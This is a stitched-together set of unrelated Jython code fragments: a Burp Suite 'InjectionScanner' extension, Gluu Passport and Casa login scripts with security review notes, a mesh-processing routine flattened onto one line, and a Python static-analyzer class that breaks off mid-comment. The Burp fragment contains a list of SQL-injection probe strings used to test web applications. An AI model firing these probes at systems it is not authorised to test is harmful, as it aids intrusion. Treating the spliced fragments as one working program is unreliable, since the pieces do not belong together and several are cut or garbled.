    # Python 2 / Jython idiom: reload(sys) makes setdefaultencoding available
    # again so the implicit str/unicode codec can be switched to UTF-8.
    reload(sys)
    sys.setdefaultencoding('utf8')

    self._callbacks = callbacks
    self._helpers = callbacks.getHelpers()
    callbacks.setExtensionName("InjectionScanner")

    # Log rows plus one lock for the log and one for HTTP work.
    self._log = ArrayList()
    self._logLock = Lock()
    self._httpLock = Lock()

    # Baseline length used to spot abnormal responses; starts at zero.
    self._basisLen = 0
    # Request method ({POST, GET}) and body type ({urlencoded, json, xml}),
    # both unset until a request is loaded.
    self._postGet = 'NaN'
    self._dataType = 'NaN'

    # Probe strings appended by the scan.
    self._simpleList = [
        '\'', '\"', '/', '/*', '#', ')', '(', ')\'', '(\'', 'and 1=1',
        'and 1=2', 'and 1>2', 'and 12', '+', 'and+12', '/**/and/**/1'
    ]
    self._xmlList = ['a', 'b', 'c', 'd', 'e']  # placeholder values, not set yet

    # Table models, XML helper and the shared event listener.
    self._dataTable = Guis_DefaultTM()
    self._logTable = Guis_AbstractTM(self)
    self._xh = XMLHandler()
    listeners = Guis_Listeners(self, self._logTable)

    # ---- UI layout ----
    # Main pane: tables on top, viewers and buttons below.
    self._mainSplitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)
    self._mainSplitpane.setResizeWeight(0.4)

    # Request data table.
    dataView = JTable(self._dataTable)
    dataScroller = JScrollPane(dataView)
    dataScroller.setPreferredSize(Dimension(0, 125))
    self._dataTable.addTableModelListener(listeners)

    # Log table.
    logView = Guis_LogTable(self._logTable)
    logScroller = JScrollPane(logView)
    logScroller.setPreferredSize(Dimension(0, 125))

    # Upper pane: data on the left, log on the right.
    upperSplit = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)
    upperSplit.setResizeWeight(0.5)
    upperSplit.setLeftComponent(dataScroller)
    upperSplit.setRightComponent(logScroller)

    # Request/response viewers.
    viewerTabs = JTabbedPane()
    self._requestViewer = callbacks.createMessageEditor(self, False)
    self._responseViewer = callbacks.createMessageEditor(self, False)
    viewerTabs.addTab("Request", self._requestViewer.getComponent())
    viewerTabs.addTab("Response", self._responseViewer.getComponent())

    # Controls.
    self._basisLabel = JLabel('Basis: ' + str(self._basisLen))
    self._levelLabel = JLabel('Level:')
    self._setBasisButton = JButton('Set Basis')
    self._hitOnceButton = JButton('Hit Once')
    self._autoScanButton = JButton('Auto Scan')
    self._clearLogButton = JButton('Clear Log')
    self._cancelButton = JButton('Cancel')
    self._levelSelection = JComboBox()
    for level in ('1', '2', '3'):
        self._levelSelection.addItem(level)
    for button in (self._hitOnceButton, self._autoScanButton,
                   self._clearLogButton, self._setBasisButton,
                   self._cancelButton):
        button.addActionListener(listeners)
    self._basisLabel.setPreferredSize(Dimension(100, 20))

    # Button bar: basis label left, buttons centred, level selector right.
    buttonBar = JPanel()
    buttonBar.setLayout(BorderLayout())
    centerPane = JPanel()
    leftPane = JPanel()
    rightPane = JPanel()
    leftPane.add(self._basisLabel)
    for button in (self._setBasisButton, self._hitOnceButton,
                   self._autoScanButton, self._cancelButton,
                   self._clearLogButton):
        centerPane.add(button)
    rightPane.add(self._levelLabel)
    rightPane.add(self._levelSelection)
    buttonBar.add(centerPane, BorderLayout.CENTER)
    buttonBar.add(leftPane, BorderLayout.WEST)
    buttonBar.add(rightPane, BorderLayout.EAST)

    # Lower pane: viewers above the button bar.
    lowerPane = JPanel()
    lowerPane.setLayout(BorderLayout())
    lowerPane.add(viewerTabs, BorderLayout.CENTER)
    lowerPane.add(buttonBar, BorderLayout.SOUTH)

    self._mainSplitpane.setLeftComponent(upperSplit)
    self._mainSplitpane.setRightComponent(lowerPane)

    # Let Burp style every component, in the same order as before.
    for component in (self._mainSplitpane, dataView, dataScroller, logView,
                      logScroller, viewerTabs, buttonBar, lowerPane,
                      self._basisLabel, self._setBasisButton,
                      self._hitOnceButton, self._autoScanButton,
                      self._clearLogButton, self._levelSelection,
                      self._cancelButton):
        callbacks.customizeUiComponent(component)

    callbacks.addSuiteTab(self)
    callbacks.registerContextMenuFactory(self)
    callbacks.registerHttpListener(self)
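def fillUser(self, foundUser, profile):
    """Copy the mapped profile attributes of an external login onto foundUser.

    profile maps attribute names to value lists. The attribute named by
    self.providerKey is skipped. Special handling:

    - "persistentId": the new value is appended to the user's persistent IDs
      unless one already contains the session's "spNameQualifier".
    - "oxExternalUid_newMfa": the new MFA identifier is appended to
      "oxExternalUid" unless the user already has a "passport-mfa:" entry.
    - "mail": also written to "oxTrustEmail" as one JSON object per address.
    - "claims": the first value is parsed as JSON; the access token and user
      info URL are stored in "transientId" and in the session attributes.
    - anything else is set on the user unchanged.

    Changes over the previous version: the access token is no longer written
    to the log (neither as the raw "claims" value nor inside the transientId
    message); e-mail addresses are JSON-escaped before being embedded in the
    oxTrustEmail objects, since they come from the external provider; and a
    user with several matching persistent IDs or MFA identifiers no longer
    triggers a pop() on an already emptied list.
    """
    # Session data needed for the persistent ID and claims handling
    identity = CdiUtil.bean(Identity)
    sessionAttributes = identity.getSessionId().getSessionAttributes()
    currentRp = sessionAttributes.get("entityId")
    issuerSpNameQualifier = sessionAttributes.get("spNameQualifier")

    for attr in profile:
        # "provider" is disregarded if part of mapping
        if attr == self.providerKey:
            continue

        values = profile[attr]
        if attr == "claims":
            # The claims JSON carries the access token; keep it out of the log.
            print "Passport-social. fillUser. %s = %s" % (attr, "<redacted>")
        else:
            print "Passport-social. fillUser. %s = %s" % (attr, values)

        # COLLECT - go through the existing persistent IDs and add the new one
        # only if none exists yet for this RP
        if attr == "persistentId":
            if (values != None):
                # There is only one value from the mapping
                newPersistenId = values[0]

                # If an existing ID matches the RP, drop the new value from
                # "values" so that no update happens below
                userPersistentIds = foundUser.getAttributeValues("persistentId")
                if (userPersistentIds != None and issuerSpNameQualifier != None):
                    for userPersistentId in userPersistentIds:
                        if (userPersistentId.find(issuerSpNameQualifier) > -1):
                            # Guarded: a second match must not pop an empty list
                            if len(values) > 0:
                                values.pop(0)

                # if there still is a persistentId, then add it to the current user profile
                if (len(values) > 0):
                    print "Passport-social. fillUser. Updating persistent IDs, original = '%s'" % userPersistentIds
                    # if there are no current Persistent IDs create a new list
                    tmpList = ArrayList(userPersistentIds) if userPersistentIds != None else ArrayList()
                    tmpList.add(newPersistenId)
                    print "Passport-social. fillUser. Updating persistent IDs, updated = '%s'" % tmpList
                    foundUser.setAttribute(attr, tmpList)
                else:
                    print "Passport-social. fillUser. PersistentId for RP '%s' already exists, ignoring new RP mapping" % issuerSpNameQualifier

        elif attr == "oxExternalUid_newMfa":
            # The attribute is present, so the MFA flow is REQUIRED.
            # First check for an MFA identifier already in the user profile
            mfaOxExternalUid = values[0]
            userOxExternalUids = foundUser.getAttributeValues("oxExternalUid")
            if (userOxExternalUids != None):
                for userOxExternalUid in userOxExternalUids:
                    if (userOxExternalUid.find("passport-mfa:") > -1):
                        # an MFA identifier exists: keep it and drop the new value
                        mfaOxExternalUid = userOxExternalUid
                        # Guarded: a second match must not pop an empty list
                        if len(values) > 0:
                            values.pop(0)

            # if a value is left, the user had no MFA identifier yet: add it
            if (len(values) > 0):
                print "Passport-social. fillUser. Updating MFA PAI oxExternalUid, original list = '%s'" % userOxExternalUids
                # if there are no current external UIDs create a new list
                tmpList = ArrayList(userOxExternalUids) if userOxExternalUids != None else ArrayList()
                tmpList.add(mfaOxExternalUid)
                print "Passport-social. fillUser. Updating persistent IDs, updated with MFA = '%s'" % tmpList
                foundUser.setAttribute("oxExternalUid", tmpList)
            else:
                print "Passport-social. fillUser. oxExternalUid for MFA '%s' already exists, ignoring new RP mapping" % mfaOxExternalUid

        elif attr == "mail":
            oxtrustMails = []
            for mail in values:
                # json.dumps quotes and escapes the address, so a value with
                # '"' or '\' cannot break out of the JSON string
                oxtrustMails.append('{"value":%s,"primary":false}' % json.dumps(mail))
            foundUser.setAttribute("oxTrustEmail", oxtrustMails)

        elif attr == "claims":
            if (values != None):
                timeSeconds = int(round(time.time()))
                # load claims: TODO validation of parsing result
                # (a missing "userinfourl" or "accesstoken" key raises KeyError)
                claims = json.loads(values[0])
                # access token attribute for the Shibboleth IDP to extract the
                # value for SAML, saved in "transientId"
                accessTokenWithRpAndTimestamp = '%s|%s|%s|%s' % (currentRp, timeSeconds, claims["userinfourl"], claims["accesstoken"])
                # Log only that it happened; the value contains the token.
                print "Passport-social. updateUser. Claims adding access token (as transientId) for RP '%s'" % currentRp
                foundUser.setAttribute("transientId", accessTokenWithRpAndTimestamp)
                # Save the claims into the session for distributed claims (USELESS TODAY, TODO: REMOVE)
                sessionAttributes.put("identityClaimsAccessToken", claims["accesstoken"])
                sessionAttributes.put("identityClaimsUserInfoURL", claims["userinfourl"])

        else:
            foundUser.setAttribute(attr, values)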
def getStartupErrors(self):
    """Return the import errors as a java.util.ArrayList of their str() forms."""
    from java.util import ArrayList

    messages = ArrayList()
    for importError in self.getImportErrors():
        text = str(importError)
        messages.add(text)
    return messages
SwapEdge(liaison, opts).compute() writeVTK(liaison) opts.clear() opts.put("coplanarity", "0.75") opts.put("tolerance", "0.6") opts.put("iterations", str(8)) SmoothNodes3DBg(liaison, opts).compute() writeVTK(liaison) #MeshWriter.writeObject3D(liaison.mesh, outDir, "" polylines = PolylineFactory(liaison.mesh, 135.0, options.size * 0.2) liaison.mesh.resetBeams() for entry in polylines.entrySet(): groupId = entry.key for polyline in entry.value: listM = ArrayList() for v in polyline: listM.add(EuclidianMetric3D(options.size)) #print "Remesh polyline of group "+str(groupId)+"/"+str(polylines.size())+" "+str(polyline.size())+" vertices" result = RemeshPolyline(liaison.mesh, polyline, listM).compute() for i in xrange(result.size() - 1): liaison.mesh.addBeam(result.get(i), result.get(i + 1), groupId) #print " New polyline: "+str(result.size())+" vertices" if options.recordFile: liaison.getMesh().getTrace().finish() MeshWriter.writeObject3D(liaison.mesh, outDir, "")
from java.util import ArrayList

# Plain Python values: a mixed-type list and an empty list.
LIST = ['One', -2, False]
EMPTY_LIST = []

# java.util.ArrayList of class-file glob patterns under "keyword" packages.
keyword_patterns = ArrayList()
keyword_patterns.add("org/**/keyword/**/**.class")
keyword_patterns.add("com/**/keyword/**/**.class")

# Second pattern list; its first entry repeats a pattern from keyword_patterns.
duplicate_keyword_patterns = ArrayList()
duplicate_keyword_patterns.add("com/**/keyword/**/**.class")
duplicate_keyword_patterns.add("my/same/keyword/**/**.class")
def createMenuItems(self, context_menu):
    """Remember the invocation context and return a one-entry context menu.

    The single "Send to Bing" item calls self.bing_menu when selected.
    """
    self.context = context_menu
    sendToBing = JMenuItem("Send to Bing", actionPerformed=self.bing_menu)
    items = ArrayList()
    items.add(sendToBing)
    return items
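def attemptAuthentication(self, identity, user_profile, user_profile_json):
    """Map an externally authenticated profile to a local user and log that user in.

    Returns False when a required attribute is missing, the provider is not in
    self.registeredProviders, creating or updating the user raised, or no local
    user was selected. Returns True without authenticating when no e-mail is
    available and the provider has "requestForEmail" set; the profile JSON is
    then stored in the working parameter "passport_user_profile". Otherwise
    returns the result of AuthenticationService.authenticate(username).

    Change over the previous version: the two unlabelled debug prints that
    wrote the provider name and the whole self.registeredProviders registry to
    the log on every attempt are removed.
    """
    # "uid" is always present in mapping, see prepareAttributesMapping
    uidRemoteAttr = self.getRemoteAttr("uid")
    providerKey = "provider" if self.behaveAs == "social" else "providerkey"
    if not self.checkRequiredAttributes(user_profile, [uidRemoteAttr, providerKey]):
        return False

    provider = user_profile[providerKey]
    if not provider in self.registeredProviders:
        print "Passport. attemptAuthentication. Identity Provider %s not recognized" % provider
        return False

    # From here on uidRemoteAttr holds the uid value, not the attribute name
    uidRemoteAttr = user_profile[uidRemoteAttr]
    if self.behaveAs == "social":
        externalUid = "passport-%s:%s" % (provider, uidRemoteAttr)
    else:
        # This is for backwards compat. Should it be passport-saml-provider:...??
        # NOTE(review): with the constant "saml" prefix the provider is not part
        # of the key, so the same uid value asserted by two registered providers
        # resolves to the same local account.
        externalUid = "passport-%s:%s" % ("saml", uidRemoteAttr)

    userService = CdiUtil.bean(UserService)
    userByUid = userService.getUserByAttribute("oxExternalUid", externalUid)

    mailRemoteAttr = self.getRemoteAttr("mail")
    email = None
    if mailRemoteAttr in user_profile:
        email = self.flatValues(user_profile[mailRemoteAttr])
        if len(email) == 0:
            email = None
        else:
            # Only the first address is used
            email = email[0]
            user_profile[mailRemoteAttr] = email

    if email == None and self.registeredProviders[provider]["requestForEmail"]:
        print "Passport. attemptAuthentication. Email was not received"

        if userByUid != None:
            # This avoids asking for the email on every login attempt
            email = userByUid.getAttribute("mail")
            if email != None:
                print "Passport. attemptAuthentication. Filling missing email value with %s" % email
                # Assumes mailRemoteAttr is not None
                user_profile[mailRemoteAttr] = email

        if email == None:
            # Store user profile in session and abort this routine
            identity.setWorkingParameter("passport_user_profile", user_profile_json)
            return True

    userByMail = None if email == None else userService.getUserByAttribute("mail", email)

    # Determine if we should add entry, update existing, or deny access
    doUpdate = False
    doAdd = False
    if userByUid != None:
        print "User with externalUid '%s' already exists" % externalUid
        if userByMail == None:
            doUpdate = True
        else:
            if userByMail.getUserId() == userByUid.getUserId():
                doUpdate = True
            else:
                # The external identity and the e-mail belong to two different
                # local users: neither flag is set, so the attempt is rejected
                print "Users with externalUid '%s' and mail '%s' are different. Access will be denied. Impersonation attempt?" % (externalUid, email)
    else:
        if userByMail == None:
            doAdd = True
        elif self.registeredProviders[provider]["emailLinkingSafe"]:
            # The local account is selected by the e-mail the provider asserts,
            # and the external identity is attached to it. That is only sound
            # for providers that verify address ownership, hence the opt-in flag.
            tmpList = userByMail.getAttributeValues("oxExternalUid")
            tmpList = ArrayList() if tmpList == None else ArrayList(tmpList)
            tmpList.add(externalUid)
            userByMail.setAttribute("oxExternalUid", tmpList)

            userByUid = userByMail
            print "External user supplying mail %s will be linked to existing account '%s'" % (email, userByMail.getUserId())
            doUpdate = True
        else:
            print "An attempt to supply an email of an existing user was made. Turn on 'emailLinkingSafe' if you want to enable linking"

    username = None
    try:
        if doUpdate:
            username = userByUid.getUserId()
            print "Passport. attemptAuthentication. Updating user %s" % username
            self.updateUser(userByUid, user_profile, userService)
        elif doAdd:
            print "Passport. attemptAuthentication. Creating user %s" % externalUid
            newUser = self.addUser(externalUid, user_profile, userService)
            username = newUser.getUserId()
    except:
        # Any failure while provisioning fails the login
        print "Exception: ", sys.exc_info()[1]
        print "Passport. attemptAuthentication. Authentication failed"
        return False

    if username == None:
        print "Passport. attemptAuthentication. Authentication attempt was rejected"
        return False
    else:
        logged_in = CdiUtil.bean(AuthenticationService).authenticate(username)
        print "Passport. attemptAuthentication. Authentication for %s returned %s" % (username, logged_in)
        return logged_in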
def generateExceedanceValues():
    """Return jf applied to a one-argument function.

    That function copies v.values() into an ArrayList and passes the list to
    calculateExceedance.
    """
    def exceedanceOf(v):
        return calculateExceedance(ArrayList(v.values()))

    return jf(exceedanceOf)
def makeNullResponse(self):
    """Return an ArrayList holding one generic "no results" response message."""
    noResults = ResponseMessageGeneric("Database Query returned no results")
    messages = ArrayList()
    messages.add(noResults)
    return messages
def getDCH_Field_Arr_for_Trial(self, trial):
    """Return the trial point's value for each entry of self.variables, in order."""
    return [
        trial.getTrialPoint().getValue(self.variables.get(position))
        for position in range(self.variables.size())
    ]


#---- Initial steps for the parameters. During optimization
#---- these steps will be reduced inside the optimizer.
delta_hint = InitialDelta()

#---- variables to optimize: one per dch, limited to [field_min, field_max]
variables = ArrayList()

field_max = 0.012
field_min = -0.012

# initial step: one thirtieth of the allowed range
field_step = (field_max - field_min) / 30

for dch_ind, dch in enumerate(dchs):
    field = dch.getField()
    var = Variable(dch.getId(), field, field_min, field_max)
    variables.add(var)
    delta_hint.addInitialDelta(var, field_step)

scorer = OrbitScorer(bpms, dchs, variables)
def setPath(self, path):
    """Replace self.path with a new ArrayList created from len(path), then add path via addPaths."""
    entryCount = len(path)
    self.path = ArrayList(entryCount)
    self.addPaths(path)
def attemptAuthentication(self, identity, user_profile, user_profile_json):
    """Map an external (Passport) profile to a local user and log that user in.

    The profile must carry "uid" and the provider key, and the provider must
    be one of self.registeredProviders. The local account is looked up by
    oxExternalUid ("passport-<provider>:<uid>") and, when an email is present,
    by "mail"; the two lookups decide between update, add, link, or deny.

    Returns False when the attempt is rejected or provisioning raises, the
    result of AuthenticationService.authenticate(username) on the normal
    path, and True *without authenticating anyone* when the email is missing
    and the provider is configured with "requestForEmail" (the profile is
    parked in the "passport_user_profile" working parameter instead).

    NOTE(review): the final authenticate(username) call takes no credential;
    everything in user_profile is trusted as an assertion from the provider.
    This routine does not verify it - confirm the caller validates the
    profile's origin and integrity before getting here.
    """

    uidKey = "uid"
    if not self.checkRequiredAttributes(user_profile, [uidKey, self.providerKey]):
        return False

    provider = user_profile[self.providerKey]
    # Only providers present in the configured registry are accepted
    if not provider in self.registeredProviders:
        print "Passport. attemptAuthentication. Identity Provider %s not recognized" % provider
        return False

    uid = user_profile[uidKey][0]
    # The provider name is part of the key, so equal uids from different providers stay distinct
    externalUid = "passport-%s:%s" % (provider, uid)

    userService = CdiUtil.bean(UserService)
    userByUid = userService.getUserByAttribute("oxExternalUid", externalUid)

    email = None
    if "mail" in user_profile:
        email = user_profile["mail"]
        if len(email) == 0:
            email = None
        else:
            # Only the first value is kept; the profile is rewritten to match
            email = email[0]
            user_profile["mail"] = [email]

    if email == None and self.registeredProviders[provider]["requestForEmail"]:
        print "Passport. attemptAuthentication. Email was not received"

        if userByUid != None:
            # This avoids asking for the email over every login attempt
            email = userByUid.getAttribute("mail")
            if email != None:
                print "Passport. attemptAuthentication. Filling missing email value with %s" % email
                user_profile["mail"] = [email]

        if email == None:
            # Store user profile in session and abort this routine
            # True here does not mean "authenticated": presumably the caller
            # goes on to ask the user for an email - verify against caller.
            identity.setWorkingParameter("passport_user_profile", user_profile_json)
            return True

    userByMail = None if email == None else userService.getUserByAttribute("mail", email)

    # Determine if we should add entry, update existing, or deny access
    doUpdate = False
    doAdd = False
    if userByUid != None:
        print "User with externalUid '%s' already exists" % externalUid
        if userByMail == None:
            doUpdate = True
        else:
            if userByMail.getUserId() == userByUid.getUserId():
                doUpdate = True
            else:
                # The email belongs to a different local account than the one
                # bound to this externalUid: deny (neither flag is set).
                print "Users with externalUid '%s' and mail '%s' are different. Access will be denied. Impersonation attempt?" % (externalUid, email)
                self.setMessageError(FacesMessage.SEVERITY_ERROR, "Email value corresponds to an already existing provisioned account")
    else:
        if userByMail == None:
            doAdd = True
        elif self.registeredProviders[provider]["emailLinkingSafe"]:
            # Account linking: the external identity is attached to an
            # existing local account purely because the emails match.
            # NOTE(review): this is only sound if the provider guarantees the
            # email was verified as belonging to the external user. If the
            # address can be self-asserted (or typed in after a
            # "requestForEmail" prompt - not visible here, confirm), enabling
            # emailLinkingSafe lets the holder of the external identity log in
            # as the local account. Worth an audit log entry / alert as well.
            tmpList = userByMail.getAttributeValues("oxExternalUid")
            tmpList = ArrayList() if tmpList == None else ArrayList(tmpList)
            tmpList.add(externalUid)
            userByMail.setAttribute("oxExternalUid", tmpList)

            userByUid = userByMail
            print "External user supplying mail %s will be linked to existing account '%s'" % (email, userByMail.getUserId())
            doUpdate = True
        else:
            # Default: an email clash with an existing account is rejected
            print "An attempt to supply an email of an existing user was made. Turn on 'emailLinkingSafe' if you want to enable linking"
            self.setMessageError(FacesMessage.SEVERITY_ERROR, "Email value corresponds to an already existing account.")

    username = None
    try:
        if doUpdate:
            username = userByUid.getUserId()
            print "Passport. attemptAuthentication. Updating user %s" % username
            self.updateUser(userByUid, user_profile, userService)
        elif doAdd:
            print "Passport. attemptAuthentication. Creating user %s" % externalUid
            newUser = self.addUser(externalUid, user_profile, userService)
            username = newUser.getUserId()
    except:
        # Any failure while provisioning fails closed: log it and reject
        print "Exception: ", sys.exc_info()[1]
        print "Passport. attemptAuthentication. Authentication failed"
        return False

    if username == None:
        # Neither update nor add was allowed above
        print "Passport. attemptAuthentication. Authentication attempt was rejected"
        return False
    else:
        logged_in = CdiUtil.bean(AuthenticationService).authenticate(username)
        print "Passport. attemptAuthentication. Authentication for %s returned %s" % (username, logged_in)
        return logged_in
def getFileErrs(self, file_, _map):
    """Return the message list stored for *file_* in *_map*, creating it on first use.

    A missing (or None) entry is replaced by a new empty ArrayList, which is
    stored in the map before being returned.
    """
    existing = _map.get(file_)
    if existing is not None:
        return existing
    created = ArrayList()
    _map[file_] = created
    return created
def authenticate(self, configurationAttributes, requestParameters, step):
    """Run one step of the Casa login flow and report whether it succeeded.

    Step 1 looks the user up by self.uid_attr. A user with no
    "oxPreferredMethod" attribute is authenticated with username/password
    only and "skip2FA" is set to True; otherwise step 1 is delegated to the
    authenticator chosen by getSuitableAcr, and "skip2FA" comes from
    determineSkip2FA.

    Any other step is treated as the second factor: it is delegated to the
    authenticator named by the session's "ACR" attribute and, on success,
    the session's "trustedDevicesInfo" is written to the user entry.

    Returns True/False for the step; unknown user, wrong credentials and
    missing ACR all end in False.
    """
    print "Casa. authenticate %s" % str(step)

    userService = CdiUtil.bean(UserService)
    authenticationService = CdiUtil.bean(AuthenticationService)
    identity = CdiUtil.bean(Identity)

    if step == 1:
        credentials = identity.getCredentials()
        user_name = credentials.getUsername()
        user_password = credentials.getPassword()

        if StringHelper.isNotEmptyString(user_name) and StringHelper.isNotEmptyString(user_password):

            foundUser = userService.getUserByAttribute(self.uid_attr, user_name)
            #foundUser = userService.getUser(user_name)

            if foundUser == None:
                # Falls through to the common "return False" below, so the
                # caller sees the same result as for a wrong password.
                print "Casa. authenticate for step 1. Unknown username"
            else:
                platform_data = self.parsePlatformData(requestParameters)
                # No preferred method stored on the entry means 2FA is off for this user
                mfaOff = foundUser.getAttribute("oxPreferredMethod") == None
                logged_in = False

                if mfaOff:
                    logged_in = authenticationService.authenticate(user_name, user_password)
                else:
                    acr = self.getSuitableAcr(foundUser, platform_data)
                    # With no suitable ACR nothing is attempted and logged_in stays False
                    if acr != None:
                        module = self.authenticators[acr]
                        logged_in = module.authenticate(module.configAttrs, requestParameters, step)

                if logged_in:
                    foundUser = authenticationService.getAuthenticatedUser()

                    if foundUser == None:
                        print "Casa. authenticate for step 1. Cannot retrieve logged user"
                    else:
                        if mfaOff:
                            identity.setWorkingParameter("skip2FA", True)
                        else:
                            #Determine whether to skip 2FA based on policy defined (global or user custom)
                            # NOTE(review): platform_data is parsed from request
                            # parameters, i.e. client-supplied; confirm the skip
                            # decision does not rest on it alone.
                            skip2FA = self.determineSkip2FA(userService, identity, foundUser, platform_data)
                            identity.setWorkingParameter("skip2FA", skip2FA)
                            identity.setWorkingParameter("ACR", acr)

                        return True

                else:
                    print "Casa. authenticate for step 1 was not successful"
        return False

    else:
        user = authenticationService.getAuthenticatedUser()
        if user == None:
            print "Casa. authenticate for step 2. Cannot retrieve logged user"
            return False

        #see casa.xhtml
        alter = ServerUtil.getFirstValue(requestParameters, "alternativeMethod")
        if alter != None:
            #bypass the rest of this step if an alternative method was provided. Current step will be retried (see getNextStep)
            # NOTE(review): `alter` is a request parameter and this branch
            # returns True without checking a factor; it is only safe if
            # simulateFirstStep/getNextStep restrict it to methods the user
            # has enrolled and force the step to be repeated - confirm there.
            self.simulateFirstStep(requestParameters, alter)
            return True

        session_attributes = identity.getSessionId().getSessionAttributes()
        acr = session_attributes.get("ACR")
        #this working parameter is used in casa.xhtml
        identity.setWorkingParameter("methods", ArrayList(self.getAvailMethodsUser(user, acr)))

        success = False
        # An ACR missing from the session or unknown to this script fails the step
        if acr in self.authenticators:
            module = self.authenticators[acr]
            success = module.authenticate(module.configAttrs, requestParameters, step)

        #Update the list of trusted devices if 2fa passed
        if success:
            print "Casa. authenticate. 2FA authentication was successful"
            tdi = session_attributes.get("trustedDevicesInfo")
            if tdi == None:
                print "Casa. authenticate. List of user's trusted devices was not updated"
            else:
                # Persisted only after the second factor succeeded
                user.setAttribute("oxTrustedDevicesInfo", tdi)
                userService.updateUser(user)
        else:
            print "Casa. authenticate. 2FA authentication failed"

        return success

    return False
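class Analyzer(object):
    """Singleton driver that loads Python files, resolves modules and collects
    bindings, references and diagnostics.

    The collections declared below are class attributes, so they are shared
    by every reference to the singleton; ``__init__`` adds the per-run tables
    (moduleTable, loadedFiles, globaltable) and publishes the instance as
    ``Analyzer.self``.
    """

    # global static instance of the analyzer itself
    #self = Analyzer()
    allBindings = ArrayList()
    references = LinkedHashMap()
    semanticErrors = HashMap()
    parseErrors = HashMap()
    cwd = None
    nCalled = 0
    multilineFunType = False
    path = ArrayList()
    uncalled = HashSet()
    callStack = HashSet()
    importStack = HashSet()
    astCache = AstCache()
    cacheDir = str()
    failedToParse = HashSet()
    stats = Stats()
    builtins = None  # Builtins()
    logger = logging.getLogger(__name__)
    loadingProgress = None
    projectDir = str()

    # singleton pattern
    _instance = None

    def __new__(cls, *args, **kwargs):
        """Create the single instance on first use and return it afterwards."""
        if not cls._instance:
            cls._instance = super(Analyzer, cls).__new__(cls, *args, **kwargs)
        return cls._instance

    def __init__(self):
        """Reset the per-run tables, record the start time and set up builtins and cache.

        Python calls ``__init__`` on every ``Analyzer()`` expression, so the
        tables assigned here are replaced each time even though ``__new__``
        hands back the same object.
        """
        self.moduleTable = Scope(None, Scope.ScopeType.GLOBAL)
        self.loadedFiles = ArrayList()
        self.globaltable = Scope(None, Scope.ScopeType.GLOBAL)
        import time
        millis = int(round(time.time() * 1000))
        self.stats.putInt("startTime", millis)
        self.logger = logging.getLogger(__name__)
        if not hasattr(Analyzer, 'self'):
            setattr(Analyzer, 'self', self)
        self.builtins = Builtins()
        self.builtins.init()
        #self.addPythonPath()
        self.createCacheDir()
        self.getAstCache()

    # main entry to the analyzer
    def analyze(self, path):
        """Load every Python file under *path* (a file or a directory)."""
        self.projectDir = _.unifyPath(path)
        self.loadFileRecursive(self.projectDir)

    def setCWD(self, cd):
        """Set the current working directory; a None argument leaves it unchanged."""
        if cd is not None:
            self.cwd = cd
        #if cd is not None:
        #    self.cwd = _.unifyPath(cd)

    def addPaths(self, p):
        """Add every entry of *p* to the search path."""
        for s in p:
            # was a bare addPath(s), which raises NameError inside a method
            self.addPath(s)

    def addPath(self, p):
        """Add one unified path to the search path."""
        self.path.add(_.unifyPath(p))

    def setPath(self, path):
        """Replace the search path with the entries of *path*."""
        self.path = ArrayList(len(path))
        self.addPaths(path)

    def addPythonPath(self):
        """Add each PYTHONPATH entry to the search path (no-op when unset)."""
        path = System.getenv("PYTHONPATH")
        if path is not None:
            # the original iterated an undefined name `segments`
            for p in path.split(os.pathsep):
                if p:
                    self.addPath(p)

    def getLoadPath(self):
        """Return cwd (if set), the project directory (if it exists) and the search path, in that order."""
        loadPath = ArrayList()
        if self.cwd is not None:
            loadPath.append(self.cwd)
        if self.projectDir is not None and os.path.isdir(self.projectDir):
            loadPath.append(self.projectDir)
        loadPath += self.path
        return loadPath

    def inStack(self, f):
        return f in self.callStack

    def pushStack(self, f):
        self.callStack.add(f)

    def popStack(self, f):
        self.callStack.remove(f)

    def inImportStack(self, f):
        return f in self.importStack

    def pushImportStack(self, f):
        self.importStack.add(f)

    def popImportStack(self, f):
        self.importStack.remove(f)

    def getAllBindings(self):
        return self.allBindings

    def getCachedModule(self, file_):
        """Return the module type already recorded for *file_*, or None.

        For a union type the first member that is a module type is returned.
        """
        t = self.moduleTable.lookupType(_.moduleQname(file_))
        if t is None:
            return None
        elif t.isUnionType():
            for tt in t.asUnionType().getTypes():
                if tt.isModuleType():
                    return tt
            return None
        elif t.isModuleType():
            return t
        else:
            return None

    def getDiagnosticsForFile(self, file_):
        """Return the semantic errors recorded for *file_* (an empty list if none)."""
        errs = self.semanticErrors.get(file_)
        if errs is not None:
            return errs
        return ArrayList()

    #@overloaded
    def putRef(self, node, bs):
        """Record that *node* refers to binding(s) *bs*; Url nodes are ignored."""
        if not hasattr(bs, '__len__'):
            bs = [bs]
        if not (isinstance(node, (Url, ))):
            ref = Ref(node)
            bindings = self.references.get(ref)
            if bindings is None:
                bindings = ArrayList()
                self.references[ref] = bindings
            for b in bs:
                if not b in bindings:
                    bindings.append(b)
                b.addRef(ref)

    def getReferences(self):
        """ generated source for method getReferences """
        return self.references

    def putProblem(self, *args):
        """Dispatch to putProblem0(loc, msg) or putProblem1(file_, begin, end, msg) by argument count."""
        if len(args) == 2:
            return self.putProblem0(*args)
        else:
            return self.putProblem1(*args)

    #@overloaded
    def putProblem0(self, loc, msg):
        """ generated source for method putProblem """
        file_ = loc.getFile()
        if file_ is not None:
            self.addFileErr(file_, loc.start, loc.end, msg)

    # for situations without a Node
    #@putProblem.register(object, str, int, int, str)
    def putProblem1(self, file_, begin, end, msg):
        """ generated source for method putProblem_0 """
        if file_ is not None:
            self.addFileErr(file_, begin, end, msg)

    def addFileErr(self, file_, begin, end, msg):
        """ generated source for method addFileErr """
        d = Diagnostic(file_, Diagnostic.Category.ERROR, begin, end, msg)
        self.getFileErrs(file_, self.semanticErrors).append(d)

    def getParseErrs(self, file_):
        return self.getFileErrs(file_, self.parseErrors)

    def getFileErrs(self, file_, _map):
        """Return the message list for *file_* in *_map*, creating it on first use."""
        msgs = _map.get(file_)
        if msgs is None:
            msgs = ArrayList()
            _map[file_] = msgs
        return msgs

    def loadFile(self, path):
        """Parse and resolve one file, returning its module type or None.

        Returns the cached module when there is one, and None for a missing
        file, a file that is currently being imported (circular import) or a
        file that fails to parse.
        """
        _.msg("loading: " + path)
        path = _.unifyPath(path)
        if not os.path.isfile(path):
            self.finer("\nfile not not found or cannot be read: " + path)
            return None
        module_ = self.getCachedModule(path)
        if module_ is not None:
            self.finer("\nusing cached module " + path + " [succeeded]")
            return module_
        # detect circular import
        if Analyzer.self.inImportStack(path):
            return None
        # set new CWD and save the old one on stack
        oldcwd = self.cwd
        # dirname keeps the leading separator of an absolute path; rebuilding
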